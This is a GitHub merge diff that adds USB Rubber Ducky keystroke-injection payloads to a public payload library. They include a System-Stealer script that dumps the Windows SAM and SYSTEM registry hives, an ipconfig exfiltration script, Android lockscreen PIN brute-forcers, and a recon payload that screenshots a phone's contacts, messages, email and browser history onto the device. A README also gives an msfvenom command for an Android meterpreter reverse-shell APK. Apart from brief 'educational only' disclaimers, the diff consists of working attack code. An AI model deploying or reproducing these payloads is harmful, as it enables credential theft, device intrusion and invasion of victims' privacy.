Merge 0d6f38865f into a8c264c752

DS3 updates and a NEW PAYLOAD!

payloads/library/exfiltration/IP-Out/README.md

@@ -0,0 +1,12 @@
+# IP-OUT
+This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
+
+
+
+
+
+## Useful Tips
+
+**Change #DRIVELABEL to your own personal drive label if it isn't already**
+
+Remember: Do not use this for unethical hacking practices! This is for educational purposed only!

payloads/library/exfiltration/IP-Out/payload.txt

@@ -0,0 +1,63 @@
+REM Title: IP-Out
+REM Author: Mavisinator30001
+REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
+REM Target: Any Windows System
+REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
+DEFINE #DRIVELABEL DUCKY
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+IF $_OS != WINDOWS
+    STOP_PAYLOAD
+END_IF
+ATTACKMODE HID STORAGE
+DELAY 500
+GUI r
+DELAY 300
+STRINGLN Powershell
+DELAY 1000
+STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
+WAIT_FOR_STORAGE_ACTIVITY
+WAIT_FOR_STORAGE_INACTIVITY
+ALT F4
+ATTACKMODE OFF
+HIDE_PAYLOAD

payloads/library/exfiltration/System-Stealer/payload.txt

@@ -0,0 +1,74 @@
+REM TITLE System Stealer
+REM AUTHOR mavisinator30001
+REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
+REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
+REM DISCLAIMER This is for educational purposes ONLY
+DELAY 1000
+ATTACKMODE HID STORAGE
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+REM Change $DRIVELABEL to the storage label of your duck
+DEFINE #DRIVELABEL DUCKY
+IF ($_OS == WINDOWS) THEN
+    GUI r
+    DELAY 500
+    STRING powershell
+    DELAY 1000
+    CTRL-SHIFT-ENTER
+    DELAY 750
+    LEFT
+    ENTER
+    DELAY 1000
+    STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
+    DELAY 250
+    STRINGLN reg save HKLM\sam $DriveLetter/sam.save
+    WAIT_FOR_STORAGE_ACTIVITY
+    WAIT_FOR_STORAGE_INACTIVITY
+    STRINGLN reg save HKLM\system $DriveLetter/system.save
+    WAIT_FOR_STORAGE_ACTIVITY
+    WAIT_FOR_STORAGE_INACTIVITY
+    ALT F4
+ELSE
+    ATTACKMODE OFF
+    STOP_PAYLOAD
+END_IF

payloads/library/general/1_Script_to_Rule_Them_All/ReadMe.md

@@ -0,0 +1,5 @@
+## 1 Script to Rule Them All
+
+The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
+
+It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.

payloads/library/general/1_Script_to_Rule_Them_All/payload.txt

@@ -0,0 +1,293 @@
+REM Title: One Script To Rule Them All
+REM Author: Korben and UberGuidoZ
+REM Description: Attempt to detect OS then run conditional code based on result.
+REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
+REM Version: 1.6
+REM Category: All of them
+REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
+
+EXTENSION OS_DETECTION_UBER
+    REM VERSION 2.0
+    REM AUTHOR: Korben and UberGuidoZ
+
+    REM_BLOCK DOCUMENTATION
+        USB Rubber Ducky Host OS Detection (moving target, may fall)
+        Results may vary greatly depending on a combination of many variables:
+         - number of testing stages
+         - specific devices and versions tested against
+         - number of systems testing for (scope)
+         - detection techniques (passive/invisible/active/hybrid)
+         - overall speed
+         - overall accuracy
+
+        If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
+
+        TARGET:
+            DEFAULT - Windows, Mac, Linux
+            ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
+
+        USAGE:
+            Call DETECT_OS_UBER() anywhere in your payload after the extension.
+            Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
+
+        FEEDBACK:
+            As mentioned above, this a moving target (especially for macOS).
+            Please report any issues identifying specific operating systems with as much detail as possible.
+            Your feedback will greatly help solidify the robustness of this extension and others based on it.
+
+        DEBUGGING:
+            SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
+    END_REM
+
+    REM CONFIGURATION
+
+REM For Debugging (use if troubleshooting or reporting issues):
+    DEFINE #DEBUGGING_OUTPUT FALSE
+    DEFINE #ADVANCED_DETECTION FALSE
+
+REM Timing fine tuning:
+    DEFINE #STARTUP_DELAY 1500
+    DEFINE #RESTART_WAIT 1000
+    DEFINE #EXECUTE_DELAY 2000
+    DEFINE #CONNECT_WAIT 1000
+    DEFINE #OS_DETECT_MODE HID
+REM Define Apple keyboard to keep macOS happy
+    DEFINE #OS_DETECT_VID VID_05AC
+    DEFINE #OS_DETECT_PID PID_021E
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #HOST_RESPONSE_TIMEOUT 1000
+
+REM Start DETECT_OS function
+    FUNCTION DETECT_OS_UBER()
+        $_HOST_CONFIGURATION_REQUEST_COUNT = 0
+        ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
+        DELAY #STARTUP_DELAY
+        SAVE_HOST_KEYBOARD_LOCK_STATE
+
+REM Debugging if TRUE
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            IF_DEFINED_TRUE #ADVANCED_DETECTION
+                STRING ADVANCED OS DETECT
+            ELSE_DEFINED
+                STRING OS DETECT
+            END_IF_DEFINED
+            ENTER
+            STRING test caps
+        END_IF_DEFINED
+
+        IF ($_CAPSLOCK_ON == FALSE) THEN
+            LED_R
+            CAPSLOCK
+            DELAY #HOST_RESPONSE_TIMEOUT
+        END_IF
+        LED_OFF
+
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            ENTER
+            STRING test done
+        END_IF_DEFINED
+
+        IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
+            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                ENTER
+                STRING received led response
+            END_IF_DEFINED
+            LED_G
+            IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Prediction: Windows
+                END_IF_DEFINED
+                $_OS = WINDOWS
+            ELSE
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Prediction: Linux
+                END_IF_DEFINED
+                $_OS = LINUX
+            END_IF
+        ELSE
+            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                ENTER
+                STRING No LED response
+                ENTER
+                STRING Prediciton: MacOS
+            END_IF_DEFINED
+            $_OS = MACOS
+        END_IF
+
+        IF_DEFINED_TRUE #ADVANCED_DETECTION
+            IF ( $_OS == LINUX ) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Soft reconnect
+                END_IF_DEFINED
+                ATTACKMODE OFF
+                DELAY #RESTART_WAIT
+                ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
+                DELAY #CONNECT_WAIT
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Reconnected
+                END_IF_DEFINED
+                IF ($_CAPSLOCK_ON == TRUE) THEN
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Caps LED on
+                        ENTER
+                        STRING Test numlock
+                    END_IF_DEFINED
+                    NUMLOCK
+                    DELAY #HOST_RESPONSE_TIMEOUT
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Test done
+                    END_IF_DEFINED
+                    IF ($_NUMLOCK_ON == FALSE) THEN
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING No numlock LED
+                            ENTER
+                            STRING Prediciton: ChromeOS
+                        END_IF_DEFINED
+                        $_OS = CHROMEOS
+                    ELSE
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING Numlock LED on
+                            ENTER
+                            STRING Testing scrolllock
+                        END_IF_DEFINED
+                        SCROLLLOCK
+                        DELAY #HOST_RESPONSE_TIMEOUT
+                        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                            ENTER
+                            STRING Test done
+                        END_IF_DEFINED
+                        IF ($_SCROLLLOCK_ON == TRUE) THEN
+                            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                                ENTER
+                                STRING Scrolllock LED on
+                                ENTER
+                                STRING Prediciton: Android
+                            END_IF_DEFINED
+                            $_OS = ANDROID
+                        ELSE
+                            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                                ENTER
+                                STRING No scrolllock reply
+                                ENTER
+                                STRING Prediction: Linux
+                            END_IF_DEFINED
+                            $_OS = LINUX
+                        END_IF
+                    END_IF
+                END_IF
+            ELSE IF ($_OS == MACOS) THEN
+                IF ($_CAPSLOCK_ON == TRUE) THEN
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Caps LED on
+                        ENTER
+                        STRING Prediction: iOS
+                    END_IF_DEFINED
+                    $_OS = IOS
+                ELSE 
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING No caps reply
+                        ENTER
+                        STRING Prediction: MacOS
+                    END_IF_DEFINED
+                    $_OS = MACOS
+                END_IF
+            ELSE IF ($_OS == WINDOWS) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Confident Windows Prediction
+                END_IF_DEFINED
+                $_OS = WINDOWS
+            END_IF
+        END_IF_DEFINED
+
+        RESTORE_HOST_KEYBOARD_LOCK_STATE
+
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            ENTER
+            STRING OS_DETECT complete
+            ENTER
+        END_IF_DEFINED
+    END_FUNCTION
+END_EXTENSION
+
+EXTENSION HELLO_OS_UBER
+    REM VERSION 2.0
+    REM AUTHOR: Korben and UberGuidoZ
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
+            after DETECT_OS_UBER() prints the OS determination. Make sure
+            your custom conditional code is inserted below where commented.
+    END_REM
+
+    REM Defining custom $_OS enums if desired
+    DEFINE #EXTRA_EXAMPLES FALSE
+    DEFINE #SOME_OTHER_OS 6
+    DEFINE #ANOTHER_OS 7
+
+    FUNCTION HELLO_OS_UBER() 
+        IF ($_OS == WINDOWS) THEN
+            REM Windows code starts here
+            DELAY 1000
+            GUI r
+            DELAY 500
+            STRINGLN notepad
+            DELAY 1000
+            STRINGLN Legit DS3 on Windows
+            REM Windows code ends here
+        ELSE IF ($_OS == MACOS) THEN
+            REM macOS code starts here
+            DELAY 2000
+            GUI SPACE
+            DELAY 500
+            STRINGLN TextEdit
+            STRINGLN Legit DS3 on macOS
+            REM macOS code ends here
+        ELSE IF ($_OS == LINUX) THEN
+            REM Linux code starts here
+            DELAY 2000
+            CTRL ALT t
+            DELAY 100
+            STRINGLN nano
+            STRINGLN Legit DS3 on Linux
+            REM Linux code ends here
+        ELSE IF ($_OS == IOS) THEN
+            REM iOS code starts here
+            REM iOS code ends here
+        ELSE IF ($_OS == CHROMEOS) THEN
+            REM ChromeOS code starts here
+            REM ChromeOS code ends here
+        ELSE IF ($_OS == ANDROID) THEN
+            REM Android code starts here
+            REM Android code ends here
+        IF_DEFINED_TRUE #EXTRA_EXAMPLES
+            ELSE IF($_OS == #SOME_OTHER_OS) THEN
+                REM Custom Other OS code starts here
+                REM Custom Other OS code ends here
+            ELSE IF($_OS == #ANOTHER_OS) THEN
+                REM Another custom Other OS code starts here
+                REM Another custom Other OS code ends here
+        END_IF_DEFINED
+            ELSE
+                REM All else fails code starts here
+                REM All else fails code ends here
+        END_IF
+    END_FUNCTION
+END_EXTENSION
+
+REM Do the do! Change delay at beginning if desired.
+
+DETECT_OS_UBER()
+DELAY #EXECUTE_DELAY
+HELLO_OS_UBER()

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/Bruteforce_Cracker/Pin-Crack.txt

@@ -0,0 +1,190 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # brute force a 4 digit pin. The first five strings you can add possible 
+REM # pins gathered from recon data by replacing the x's with pins or delete 
+REM # these lines if you just want random generated pins.The pin length can be 
+REM # modified by X string length and adding addtional "RANDOM_NUMBER" entries 
+REM # below to increase the length of the random pins that are generated.
+REM # This is a run once script intended for engagements.
+DELAY 3000
+ATTACKMODE HID
+REM # Scroll up, wake screen and start cracking
+SPACE
+DELAY 100
+SPACE
+DELAY 1000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING x
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 32000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 32000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 60000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 60000
+DELAY 60000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER
+DELAY 2000
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+RANDOM_NUMBER
+ENTER

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/PRANKS/CHANGE-LANUAGES.txt

@@ -0,0 +1,126 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # brute force a pin and change the default language on the target device 
+REM # Once the pin is cracked click the ducky button once to start the payload
+
+BUTTON_DEF
+ATTACKMODE HID 
+DELAY 2000
+REM # Navigate to home screen
+GUI ENTER
+DELAY 2000
+REM # move to settings menu
+GUI z
+DELAY 1000
+REM Search for general management
+ENTER
+DELAY 1000
+STRING general management
+DELAY 1000
+REM # Select general management
+
+VAR $FIND = 4
+WHILE ( $FIND > 0 )
+    TAB
+    DELAY 200
+    $FIND = ( $FIND - 1 )
+END_WHILE
+
+ENTER
+DELAY 1000
+REM # Select language
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+ENTER
+REM # Select "ADD language"
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+ENTER
+DELAY 1000
+REM # Select language To change to
+VAR $CHANGE = 5
+WHILE ( $CHANGE > 0 )
+    DOWNARROW
+    DELAY 200
+    $CHANGE = ( $CHANGE - 1 )
+END_WHILE
+
+DELAY 200
+ENTER
+REM # Set as default
+DELAY 200
+ENTER
+DELAY 200
+REM # Go home
+GUI ENTER
+DELAY 1000
+REM # Delete all recent tabs that were opened on the device
+
+VAR $WIPE = 8
+WHILE ( $WIPE > 0 )
+    ALT TAB
+    DELAY 100
+    ALT F4
+    DELAY 100
+    $WIPE = ( $WIPE - 1 )
+END_WHILE
+REM # If not already at the home screen, going to home screen
+DELAY 1000
+GUI ENTER
+REM # Locking the device back up
+DELAY 1000
+GUI l
+DELAY 100
+REM # Turning attackmode off
+ATTACKMODE OFF
+DELAY 1000
+END_BUTTON
+
+DELAY 3000
+REM # Scroll up, wake screen and start cracking
+REM # The first five strings you can add possible pins gathered from recon 
+REM # data by replacing the x's with pins or delete these lines, this 
+REM # payload is for a 4 digit pin. The pin length can be modified by X string
+REM # length and adding addtional "RANDOM_NUMBER" entries below to increase
+REM # the length of the random pins that are generated.
+ATTACKMODE HID
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 1000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 32000

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/README.md

@@ -0,0 +1,26 @@
+# ANDROID_BLANKET_PARTY
+This repository houses all my Android Rubber Ducky payloads, most of these payloads will also work with a O.MG cable 
+
+//BLANKET PArty as in that iconic scene from "FUll MEtal Jacket"//
+![image](https://github.com/salvat1on/ANDROID_BLANKET_PARTY/assets/27372029/4ca1e4a8-846d-4da1-b140-8399392bd945)
+
+Swipe-to-open.txt will install an apk to the target device that resides in the ducky storage.
+
+The [STAND-ALONE] Pin / Password lockscreen brute force payloads will also be included in 
+this Repository.
+
+You can create an APK Payload with metasploit with the following command in the terminal
+
+msfvenom -p android/meterpreter_reverse_tcp LHOST=YOUR_ADDRESS LPORT=5555 -o WHATEVER_NAME.apk
+
+The APK file must then be copied to the ducky along side the bin file you place there as well.
+
+The APK payloads rely on a bug I found and will be reporting soon, within the APP install process
+
+[SWIPE TO OPEN DEMO]
+
+[![IMAGE ALT TEXT HERE](https://i.ibb.co/Yh2D6Vt/swipe.png)](https://youtu.be/Hon9YmdVehQ)
+
+[PIN CRACKER DEMO]
+
+[![IMAGE ALT TEXT HERE](https://i.ibb.co/gJKgg6b/pin-crack.png)](https://youtube.com/shorts/jV1f7E00P_g)

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/Recon/Blanket_Party_Recon.txt

@@ -0,0 +1,457 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # brute force a 4 digit pin and take 10 screenshots of contacts, 10
+REM # screenshots of text logs, 5 screenshots of the browser history,
+REM # one screenshot of notifications, one screenshot of current email,
+REM # and 1 screenshot of the last number called. Then move all 
+REM # screenshots to the ducky storage. Once the pin is cracked press the
+REM # ducky button once to start stage 2 of the payload ( gathering INTEL) 
+REM # If you would like to add more pin guesses and pin randomization consider 
+REM # replacing the bottom of this script with my "pin-crack" attack. This
+REM # script is intended to give you 5 attempts with pins you have gathered
+REM # from recon.This attack will take all screenshots on the device, not
+REM # just the ones the ducky takes, 50% of screenshots are accidents the other
+REM # 50% are important things that cannot be forgotten. Make sure your ducky
+REM # has enough storage to accomidate this attack.
+BUTTON_DEF
+ATTACKMODE HID STORAGE
+DELAY 2000
+REM # If not at homescreen going home
+GUI ENTER
+DELAY 1000
+REM # Open phone
+GUI f
+DELAY 1000
+STRING phone
+DELAY 1000
+ENTER
+DELAY 200
+ENTER
+DELAY 1500
+REM # Pull up last number dialed
+ENTER
+DELAY 1000
+ALT PRINTSCREEN
+DELAY 1000
+REM # closing out screenshot window
+ESC
+DELAY 500
+REM # Going to homescreen
+GUI ENTER
+DELAY 1000
+REM # open notifications
+GUI n
+DELAY 1000
+REM # Take screenshot
+ALT PRINTSCREEN
+DELAY 1000
+ESC 
+DELAY 500
+REM # Going back to homescreen
+GUI ENTER
+DELAY 1000
+REM # Open email
+GUI e
+DELAY 2000
+REM # Take screenshot of recent inbox
+ALT PRINTSCREEN
+DELAY 1000
+ESC
+DELAY 500
+REM # Going back to homescreen
+GUI ENTER
+DELAY 1000
+REM # Open browser 
+GUI b
+DELAY 3000
+REM # Open browser menu , select history and open
+MENU
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+ENTER
+REM # Start taking screenshots of browser history
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+DELAY 200
+PAGEDOWN
+DELAY 200
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+
+VAR $FALL = 10
+WHILE ( $FALL > 0 )
+    DOWNARROW
+    DELAY 200
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+DELAY 1000
+ALT PRINTSCREEN
+REM # Clearing screenshot window so scrolling can continue
+DELAY 500
+ESC
+DELAY 1000
+REM # Returning to Homescreen
+GUI ENTER
+DELAY 1000
+REM # Jump to messages, take screenshot - scroll, rinse and repeat
+GUI s
+DELAY 1000
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $DIP = 15
+WHILE ( $DIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $DIP = ( $DIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 1000
+REM # Closing out screenshot share window
+ESC
+DELAY 500
+
+VAR $TRIP = 8
+WHILE ( $TRIP > 0 )
+    DOWNARROW
+    DELAY 200
+    $TRIP = ( $TRIP - 1 )
+END_WHILE
+
+ALT PRINTSCREEN
+DELAY 2000
+REM # Closing out screenshot share window
+ESC
